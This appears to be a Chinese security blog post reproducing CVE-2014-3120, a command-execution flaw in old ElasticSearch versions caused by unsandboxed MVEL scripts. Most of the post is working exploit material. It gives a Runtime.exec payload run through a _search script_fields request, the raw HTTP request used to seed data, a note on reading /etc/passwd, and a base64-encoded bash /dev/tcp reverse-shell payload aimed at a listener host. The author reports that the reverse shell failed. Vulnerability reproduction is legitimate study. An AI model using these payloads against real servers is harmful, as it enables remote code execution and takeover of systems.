資料庫安全-ElasticSearch漏洞復現

kkrystle發表於2024-08-09
資料庫Elasticsearch

CVE-2014-3120命令執行漏洞

一、漏洞詳情

老版本ElasticSearch支援傳入動態指令碼(MVEL)來執行一些複雜的操作,而MVEL可執行Java程式碼,而且沒有沙盒,所以我們可以直接執行任意程式碼。
MVEL執行命令程式碼:

import java.io.*;
new java.util.Scanner(Runtime.getRuntime().exec("whoami").getInputStream()).useDelimiter("\\A").next();

二、漏洞復現

訪問 http://47.236.138.222:9200/
image

在Repeater中修改報文,透過_search來獲取payload的響應結果。此時需要注意,如果庫裡沒有資料的情況下,需要先寫入一條資料後,才可以注入成功。

POST /helloword/hello HTTP/1.1
Host: 47.236.138.222:9200
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

{
"name":"esdemo"
}

image
再次獲取注入結果

{
	"size": 1,
	"script_fields":{
		"command": {
			"script": "import java.io.*; new java.util.Scanner(Runtime.getRuntime().exec(\"whoami\").getInputStream()).useDelimiter(\"\\\\A\").next();"
		}
	}
}

image
檢視etc/passwd

image
反彈連線
bash -i >&/dev/tcp/192.168.226.130/7777 0>&1

bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzE5Mi4xNjguMjI2LjEzMC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}

構造payload

{
	"size": 1,
	"script_fields":{
		"command": {
			"script": "import java.io.*; new java.util.Scanner(Runtime.getRuntime().exec(\"bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzE5Mi4xNjguMjI2LjEzMC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}\").getInputStream()).useDelimiter(\"\\\\A\").next();"
		}
	}
}

開啟監聽重新放包(失敗)
image

相關文章